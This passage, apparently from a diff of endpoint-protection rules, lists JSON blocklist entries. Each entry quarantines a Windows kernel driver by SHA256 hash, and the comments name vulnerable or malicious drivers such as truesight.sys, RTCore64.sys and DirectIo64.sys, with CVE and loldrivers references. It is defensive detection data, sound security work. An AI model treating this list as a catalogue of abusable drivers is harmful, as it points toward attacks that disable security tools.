"2026-03-23T11:45:30.832737Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0191860d2680f25783f5a383bdb4d31727e4d25761ccc506655c4f4f30b69228", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2f4cb198-2d97-5bde-95a3-ca20486cca49", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144072Z", + "creation_date": "2026-03-23T11:45:31.144074Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144080Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05cce97384d67bdd1f52138ba5a3755ccae99652d7b6c464c38feacc6729d5d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2f605f93-1e4d-5d13-befe-38f0a03f7da2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605735Z", + "creation_date": "2026-03-23T11:45:29.605737Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605742Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "033c98b9b05a33b5c5c4e2f358c38f5f6447d9dc2f9d622fdb9295d85d2a29bc", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2f635675-3c68-57b5-a363-13e94cb7c611", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981437Z", + "creation_date": "2026-03-23T11:45:29.981439Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981444Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "a19fc837ca342d2db43ee8ad7290df48a1b8b85996c58a19ca3530101862a804",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f774cb2-0bcf-5172-a670-8a7fa389d269",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622385Z",
+ "creation_date": "2026-03-23T11:45:29.622387Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622392Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4c154a0073bbad3c9f8ab7218e9b3be252ae705c20c568861dae4088f17ffcc",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f80f313-a112-51df-a7fc-cbd00c58d3b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": 
"system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460294Z",
+ "creation_date": "2026-03-23T11:45:30.460297Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460306Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fded693528f7e6ac1af253e0bd2726607308fdaa904f1e7242ed44e1c0b29ae8",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f8d7fc4-2d78-51e9-b20e-4cc04fda9400",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481061Z",
+ "creation_date": "2026-03-23T11:45:30.481063Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481069Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5fbfd7c4ea3db1197ad38d5a945acf6f2f42cb350380cf8ae276bc80b0dedb77",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f9cab69-94fc-590f-a769-2fa2b3fd0953",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815822Z",
+ "creation_date": "2026-03-23T11:45:30.815824Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815830Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32bd0edb9daa60175b1dc054f30e28e8dbfa293a32e6c86bfd06bc046eaa2f9e",
+ "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fad6ddb-0739-5bfe-9d90-5ed6df9e856e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141468Z",
+ "creation_date": "2026-03-23T11:45:31.141470Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ 
"hl_testing_start_time": "2026-03-23T11:45:31.141476Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea623a572ab20d2639ae1555a20d1183b37fe8c19e909a165f63dd6e8f8c6f4a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fbf3e25-f6ff-5949-8d31-c95f5108e3f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611291Z",
+ "creation_date": "2026-03-23T11:45:29.611292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611298Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e650b4e4b5a95cba582b9749cac4c40e67e854d78eb8494f46f6d11f1fcea4d6",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fc5fc97-2820-59f8-8b0d-8b60e4dad93a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ 
"effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471771Z",
+ "creation_date": "2026-03-23T11:45:30.471774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471783Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3813c1aab1760acb963bcc10d6ea3fddc2976b9e291710756408de392bc9e5d5",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fcc7554-d6ac-5348-94da-2583db967876",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143077Z",
+ "creation_date": "2026-03-23T11:45:32.143079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": 
"d23f28169d6e5c09a89e5136a4ff899a3b6f886535bb0254a27dd00a2753c412",
+ "comment": "Vulnerable Kernel Driver (aka msr.sys) [https://www.loldrivers.io/drivers/ee6fa2de-d388-416c-862d-24385c152fad/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fd08b47-80b8-5cc5-9ea5-130a473f6820",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495671Z",
+ "creation_date": "2026-03-23T11:45:31.495673Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495678Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0bb9c31c9e971e9fd6b4854ce94078ac55b4cf8e4527ecdb5bfba6ef46d6d778",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fd5c952-1d62-5b9e-b55c-fe0053e50f00",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": 
"system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457366Z",
+ "creation_date": "2026-03-23T11:45:30.457369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457377Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6a53d4cf39b4b0b5069359d0a3b32eb1aa7b56c427487c9f838eb279c6a90d1",
+ "comment": "Malicious Kernel Driver (aka 4748696211bd56c2d93c21cab91e82a5.sys) [https://www.loldrivers.io/drivers/2d6c1da6-17e2-4385-ad93-1430f83bde83/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fd79d01-4916-5629-b28b-49a2c4a1713c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607053Z",
+ "creation_date": "2026-03-23T11:45:29.607056Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607061Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c2d8e8487de5e7749f9899f6fefa6e7d40b394479449b5027a895392af23349",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] 
[authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fdb3b05-ffc2-5e28-9b3f-f91d49368be4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813588Z",
+ "creation_date": "2026-03-23T11:45:31.813591Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813600Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0d8392881ea337e127c4575edfc882335d810eb6d4cf1055bcb8d0289d38730",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fe65d51-0211-519d-88d3-a81689ff9dc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985796Z",
+ "creation_date": "2026-03-23T11:45:29.985798Z",
+ "enabled": true,
+ "block_on_agent": true,
+ 
"quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985803Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0399dd3c395f84cbd6ac2e3e8ca8ee344a0f699b17db0624f936ae4bb4b7953",
+ "comment": "Malicious Kernel Driver (aka wfshbr64.sys) [CVE-2022-42046] [https://github.com/kkent030315/CVE-2022-42046] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fed0ec5-e714-5669-8d94-0c28cf1d73b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148399Z",
+ "creation_date": "2026-03-23T11:45:31.148401Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148406Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a557758ab1235961be0cdd324f746bc38b75cf9b8873b4c30d24152c03fe8b3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ff1235f-4f14-5960-87fb-e478c0a98bea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 
10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144340Z",
+ "creation_date": "2026-03-23T11:45:31.144342Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144347Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2eb7904ecdbc96a8ea155c0f4d562753e65fc181f14179857cc32c9d9cc5f457",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3001c0f1-06e7-54b5-96e2-2b99bd9896d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145827Z",
+ "creation_date": "2026-03-23T11:45:32.145828Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145834Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null, 
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79d48dd02d288dc1788ab3615e6de3c01e575abd19b27434c0f3f557db43592c",
+ "comment": "Malicious Kernel Driver (aka driver_82d928c5.sys) [https://www.loldrivers.io/drivers/af8ef3c0-8686-4112-992b-86587a4a9060/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3007066e-9172-540a-b8ff-2615432c6898",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144744Z",
+ "creation_date": "2026-03-23T11:45:32.144766Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144771Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49373ea79d942e82873583a6515950acc04c578e75720593383ffb7ba4a28f3b",
+ "comment": "Malicious Kernel Driver (aka windivert.sys) [https://www.loldrivers.io/drivers/45a31a17-f78d-48ec-beba-74f6bfc5f96e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30158fc4-f82c-5215-8746-b8dad77ac989",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": 
{
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479668Z",
+ "creation_date": "2026-03-23T11:45:30.479670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479675Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e238d351e16d4909ca394f1db0326a60d33c9ac7b4d78aefcf17a6d9cc72be9",
+ "comment": "Vulnerable Kernel Driver (aka amifldrv64.sys) [https://www.loldrivers.io/drivers/a5eb98bf-2133-46e8-848f-a299ea0ddefa/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "301735eb-d0c2-55d8-8338-4c5f51f2503e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155293Z",
+ "creation_date": "2026-03-23T11:45:31.155295Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155300Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5fc8d085871c6d4f6b44f6eabafc3e7d6f49024166e65defdd0248d1de5babd0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "302170b5-68d9-54b3-bcd4-46cddbe26835",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
